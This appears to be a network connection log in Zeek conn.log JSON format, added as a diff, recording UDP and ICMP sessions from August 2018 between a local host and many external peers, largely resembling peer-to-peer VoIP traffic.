+{"ts":"2018-08-03T23:38:45.914013Z","uid":"CjBSYa4LTWIBTspas5","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.56.149","id.resp_p":443,"proto":"udp","duration":12.716381,"orig_bytes":36,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":92,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:58.630271Z","uid":"CvJquk20mF7ksshMIa","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"71.165.63.186","id.resp_p":14175,"proto":"udp","duration":0.00069,"orig_bytes":90,"resp_bytes":0,"conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":5,"orig_ip_bytes":230,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:58.807553Z","uid":"CiLThm37hoQ8CgWDEb","id.orig_h":"117.211.110.103","id.orig_p":3,"id.resp_h":"192.168.0.53","id.resp_p":1,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":true,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":76,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"IN"} +{"ts":"2018-08-03T23:38:58.907576Z","uid":"CWz6bh4S5Z4bJmcVh","id.orig_h":"78.165.7.85","id.orig_p":41918,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"TR"} +{"ts":"2018-08-03T23:38:58.959577Z","uid":"C0rKs6nnGioi2E2G5","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"95.42.118.45","id.resp_p":18763,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"BG"} +{"ts":"2018-08-03T23:38:59.154520Z","uid":"C7pTAJ1DeGWKjtkk9f","id.orig_h":"173.247.28.148","id.orig_p":55944,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:51.399479Z","uid":"CQHlHL1n5AHgkNINed","id.orig_h":"123.192.89.25","id.orig_p":3,"id.resp_h":"192.168.0.53","id.resp_p":1,"proto":"icmp","duration":7.818223,"orig_bytes":192,"resp_bytes":0,"conn_state":"OTH","local_orig":false,"local_resp":true,"missed_bytes":0,"orig_pkts":4,"orig_ip_bytes":304,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"TW"} +{"ts":"2018-08-03T23:38:59.284077Z","uid":"CMDzX72mEVNz7Wf8Wj","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"190.225.99.158","id.resp_p":1044,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"AR"} +{"ts":"2018-08-03T23:38:59.308399Z","uid":"CdQwsS2626WXZrUu62","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.235.154","id.resp_p":443,"proto":"udp","duration":0.000009,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"IE"} +{"ts":"2018-08-03T23:38:58.618629Z","uid":"C8x5lXqMB3NqJs0a3","id.orig_h":"192.168.0.2","id.orig_p":3,"id.resp_h":"95.134.167.139","id.resp_p":10,"proto":"icmp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":75,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"UA"} +{"ts":"2018-08-03T23:38:58.831931Z","uid":"CwOzEJGkAWAP7JZpl","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"210.159.233.187","id.resp_p":42458,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"JP"} +{"ts":"2018-08-03T23:38:58.831880Z","uid":"C4p4rrulW4GVlq4n8","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.41","id.resp_p":40014,"proto":"udp","duration":0.000055,"orig_bytes":22,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:58.965396Z","uid":"COl60i46IBHqhe2J53","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"174.19.211.33","id.resp_p":14676,"proto":"udp","duration":0.000081,"orig_bytes":54,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":138,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.081173Z","uid":"Cgx7hm2FeJr5WMcIKe","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"74.117.40.243","id.resp_p":27128,"proto":"udp","duration":0.000088,"orig_bytes":54,"resp_bytes":0,"conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":3,"orig_ip_bytes":138,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"CA"} +{"ts":"2018-08-03T23:38:59.156947Z","uid":"C8A12U3WuxMGBI2gxb","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"176.10.196.178","id.resp_p":31183,"proto":"udp","duration":0.000039,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"SE"} +{"ts":"2018-08-03T23:38:20.181269Z","uid":"C7VXIN2h9O0v6wtYRj","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.77.176","id.resp_p":443,"proto":"udp","duration":38.990008,"orig_bytes":18,"resp_bytes":52,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^dD","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":2,"resp_ip_bytes":108,"tunnel_parents":[],"resp_cc":"HK"} +{"ts":"2018-08-03T23:38:59.282727Z","uid":"C8tNPM2SO0wIrMyKia","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"175.144.190.245","id.resp_p":59836,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"MY"} +{"ts":"2018-08-03T23:38:59.285544Z","uid":"C4ujHn3P9FU1ZIjgX4","id.orig_h":"118.237.64.208","id.orig_p":51924,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"JP"} +{"ts":"2018-08-03T23:38:59.285625Z","uid":"CS140K1HuzQUXCYsGb","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.56.158","id.resp_p":443,"proto":"udp","duration":0.000008,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.304796Z","uid":"C8GSR31faX9oOVe7p7","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.130.147","id.resp_p":443,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.286557Z","uid":"C0Mu4l98SzaPMqbr8","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"2.104.56.155","id.resp_p":12272,"proto":"udp","duration":0.020348,"orig_bytes":66,"resp_bytes":88,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":150,"resp_pkts":4,"resp_ip_bytes":200,"tunnel_parents":[],"resp_cc":"DK"} +{"ts":"2018-08-03T23:38:59.307761Z","uid":"C17f9Q2OOA06U64DB7","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.235.150","id.resp_p":443,"proto":"udp","conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^d","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"IE"} +{"ts":"2018-08-03T23:38:59.311772Z","uid":"CBZ2172qcabRVZbWDc","id.orig_h":"77.105.252.49","id.orig_p":64743,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.000289,"orig_bytes":22,"resp_bytes":22,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":50,"tunnel_parents":[],"orig_cc":"SE"} +{"ts":"2018-08-03T23:38:59.313003Z","uid":"C1GJxSGntVF9mY0Q9","id.orig_h":"78.68.109.53","id.orig_p":48176,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.000508,"orig_bytes":63,"resp_bytes":42,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":147,"resp_pkts":2,"resp_ip_bytes":98,"tunnel_parents":[],"orig_cc":"SE"} +{"ts":"2018-08-03T23:38:58.816173Z","uid":"C9BvmW3pcw1WVOqYk2","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"46.173.83.142","id.resp_p":44615,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"RU"} +{"ts":"2018-08-03T23:38:58.907570Z","uid":"C5BPxg4Cj4UenFriB4","id.orig_h":"92.255.128.190","id.orig_p":13600,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.000053,"orig_bytes":78,"resp_bytes":54,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":162,"resp_pkts":3,"resp_ip_bytes":138,"tunnel_parents":[],"orig_cc":"RU"} +{"ts":"2018-08-03T23:38:59.156956Z","uid":"CCYXPI3bwVcNySk6Jk","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"78.227.203.205","id.resp_p":39562,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"FR"} +{"ts":"2018-08-03T23:38:59.154359Z","uid":"Cy0KRx3M13IlPeycn9","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"84.251.157.15","id.resp_p":23932,"proto":"udp","duration":0.031123,"orig_bytes":154,"resp_bytes":154,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":7,"orig_ip_bytes":350,"resp_pkts":7,"resp_ip_bytes":350,"tunnel_parents":[],"resp_cc":"FI"} +{"ts":"2018-08-03T23:38:59.251118Z","uid":"Cat3zpVdYSlO9JlL1","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"108.250.96.99","id.resp_p":56491,"proto":"udp","duration":0.000009,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.251113Z","uid":"CXF7x4196mu1z44dh","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"153.163.168.16","id.resp_p":36518,"proto":"udp","duration":0.000088,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"JP"} +{"ts":"2018-08-03T23:38:59.284068Z","uid":"CE00xE1pYbmTLpgvy9","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"190.153.73.84","id.resp_p":31433,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"VE"} +{"ts":"2018-08-03T23:38:59.293447Z","uid":"CDRJOD2rgsxa2pV88c","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"73.193.157.153","id.resp_p":9178,"proto":"udp","duration":0.014555,"orig_bytes":137,"resp_bytes":105,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":6,"orig_ip_bytes":305,"resp_pkts":5,"resp_ip_bytes":245,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:58.831923Z","uid":"Ce3XfE20DWGm8rJ6mc","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"188.16.222.44","id.resp_p":19923,"proto":"udp","duration":0.000264,"orig_bytes":54,"resp_bytes":78,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":138,"resp_pkts":3,"resp_ip_bytes":162,"tunnel_parents":[],"resp_cc":"RU"} +{"ts":"2018-08-03T23:38:58.907617Z","uid":"C6FKUc3W8vnSPR3rBb","id.orig_h":"41.83.42.158","id.orig_p":59388,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"SN"} +{"ts":"2018-08-03T23:38:58.965437Z","uid":"CoCUPO3vHn8DzaTo47","id.orig_h":"90.154.244.44","id.orig_p":54458,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.000009,"orig_bytes":26,"resp_bytes":18,"conn_state":"SF","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":1,"resp_ip_bytes":46,"tunnel_parents":[],"orig_cc":"BG"} +{"ts":"2018-08-03T23:38:48.773825Z","uid":"CSfNrd12UKMHXJu6Y4","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"64.4.23.175","id.resp_p":40030,"proto":"udp","duration":10.38014,"orig_bytes":80,"resp_bytes":20,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":136,"resp_pkts":1,"resp_ip_bytes":48,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.170919Z","uid":"CpcjQp6LRPaFazGRh","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"78.27.127.90","id.resp_p":28382,"proto":"udp","duration":0.000075,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"FI"} +{"ts":"2018-08-03T23:38:59.179219Z","uid":"CssK1BvmG5dMZV6Yf","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"69.86.72.57","id.resp_p":12586,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.154359Z","uid":"CNCJPI3HxMFrPto9d2","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"149.5.45.28","id.resp_p":50006,"proto":"udp","duration":0.037185,"orig_bytes":71439,"resp_bytes":273,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":163,"orig_ip_bytes":76003,"resp_pkts":14,"resp_ip_bytes":665,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.282730Z","uid":"CtVeDP1IN2g6oTOaNc","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"91.243.239.0","id.resp_p":21182,"proto":"udp","duration":0.000014,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"RU"} +{"ts":"2018-08-03T23:38:59.284894Z","uid":"CULJ8g3nxIS8KRVvuf","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"151.228.254.24","id.resp_p":47506,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"GB"} +{"ts":"2018-08-03T23:38:59.303384Z","uid":"CCTM5K3dvSTtmxzBaf","id.orig_h":"142.196.43.136","id.orig_p":9696,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:59.304843Z","uid":"CMnTnC2sBmp1vwvgOa","id.orig_h":"197.39.148.108","id.orig_p":26347,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"EG"} +{"ts":"2018-08-03T23:38:59.307156Z","uid":"CTJGCx4IA506SmdVAc","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"220.100.56.98","id.resp_p":26305,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"JP"} +{"ts":"2018-08-03T23:38:59.768837Z","uid":"CqjRDJxKYjJEzRJLi","id.orig_h":"111.221.77.170","id.orig_p":40004,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","duration":0.00358,"orig_bytes":108,"resp_bytes":0,"conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":2,"orig_ip_bytes":164,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"HK"} +{"ts":"2018-08-03T23:38:59.798502Z","uid":"CWdGKt2En3f0JlRAv","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.14","id.resp_p":40021,"proto":"udp","conn_state":"S0","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":181,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:13.144165Z","uid":"C1IybI3tO4PhOQa2Tf","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.56.52.25","id.resp_p":443,"proto":"udp","duration":45.687883,"orig_bytes":108,"resp_bytes":182,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^dD","orig_pkts":6,"orig_ip_bytes":276,"resp_pkts":7,"resp_ip_bytes":378,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:41.857630Z","uid":"CzMNBJx8dBTZARGq","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.45","id.resp_p":40008,"proto":"udp","duration":17.165394,"orig_bytes":134,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":5,"orig_ip_bytes":274,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:59.073828Z","uid":"CUh1Ks4NLLM50cX04f","id.orig_h":"24.104.251.238","id.orig_p":16177,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":48,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:59.080940Z","uid":"C9Acox4TlIAFtGgZyb","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.45","id.resp_p":40033,"proto":"udp","duration":0.000031,"orig_bytes":22,"resp_bytes":98,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":50,"resp_pkts":1,"resp_ip_bytes":126,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:48.772909Z","uid":"C8o5jTlJ315vMl1Aj","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.235.156","id.resp_p":40004,"proto":"udp","duration":10.38109,"orig_bytes":40,"resp_bytes":40,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":68,"resp_pkts":2,"resp_ip_bytes":96,"tunnel_parents":[],"resp_cc":"IE"} +{"ts":"2018-08-03T23:38:59.175224Z","uid":"CVqWUy1oYFalfwIRq5","id.orig_h":"24.222.49.20","id.orig_p":46592,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":54,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"CA"} +{"ts":"2018-08-03T23:38:59.226590Z","uid":"Cvc8DO2Z0gyM6RWrs5","id.orig_h":"72.181.102.235","id.orig_p":54830,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":47,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:51.975495Z","uid":"ChHww54V4pfl0rOMT9","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.46","id.resp_p":40011,"proto":"udp","duration":7.27563,"orig_bytes":66,"resp_bytes":294,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":3,"orig_ip_bytes":150,"resp_pkts":3,"resp_ip_bytes":378,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:59.285966Z","uid":"COB9GEWtmpwZmYZE3","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"186.88.118.195","id.resp_p":55520,"proto":"udp","duration":0.00006,"orig_bytes":18,"resp_bytes":26,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":46,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"VE"} +{"ts":"2018-08-03T23:38:59.812339Z","uid":"CmnB7MQSZ6YPZpMVd","id.orig_h":"5.166.100.102","id.orig_p":26905,"id.resp_h":"192.168.0.2","id.resp_p":80,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":47,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"RU"} +{"ts":"2018-08-03T23:38:59.820611Z","uid":"Cci2cI139xeUS9re24","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.28","id.resp_p":40007,"proto":"udp","duration":0.000033,"orig_bytes":151,"resp_bytes":21,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":179,"resp_pkts":1,"resp_ip_bytes":49,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:58.907519Z","uid":"CgHmcb1qHUNEmCQ5Mh","id.orig_h":"157.56.52.29","id.orig_p":40009,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":126,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"US"} +{"ts":"2018-08-03T23:38:16.301708Z","uid":"COIsrM3RPJs7o3fp0d","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.20","id.resp_p":443,"proto":"udp","duration":42.779344,"orig_bytes":126,"resp_bytes":234,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^dD","orig_pkts":7,"orig_ip_bytes":322,"resp_pkts":9,"resp_ip_bytes":486,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:59.191948Z","uid":"C0B1II33pYUn5eG5hg","id.orig_h":"213.199.179.152","id.orig_p":40020,"id.resp_h":"192.168.0.54","id.resp_p":55269,"proto":"udp","conn_state":"S0","local_orig":false,"local_resp":true,"missed_bytes":0,"history":"D","orig_pkts":1,"orig_ip_bytes":706,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"orig_cc":"IE"} +{"ts":"2018-08-03T23:38:59.226593Z","uid":"CvzMDA1OYQFvJYgMG9","id.orig_h":"192.168.0.2","id.orig_p":3,"id.resp_h":"72.181.102.235","id.resp_p":10,"proto":"icmp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":75,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:19.814792Z","uid":"CsTVid1PRExw0vkaGi","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"111.221.74.38","id.resp_p":443,"proto":"udp","duration":39.436363,"orig_bytes":90,"resp_bytes":78,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":5,"orig_ip_bytes":230,"resp_pkts":3,"resp_ip_bytes":162,"tunnel_parents":[],"resp_cc":"SG"} +{"ts":"2018-08-03T23:38:59.251106Z","uid":"CRASKD2Imni5akpVN","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"184.189.86.58","id.resp_p":31831,"proto":"udp","duration":0.000109,"orig_bytes":36,"resp_bytes":52,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":2,"orig_ip_bytes":92,"resp_pkts":2,"resp_ip_bytes":108,"tunnel_parents":[],"resp_cc":"US"} +{"ts":"2018-08-03T23:38:59.284167Z","uid":"C2ATzb18TFlxQO8iag","id.orig_h":"192.168.0.54","id.orig_p":55269,"id.resp_h":"157.55.56.151","id.resp_p":443,"proto":"udp","conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^d","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":54,"tunnel_parents":[],"resp_cc":"US"} 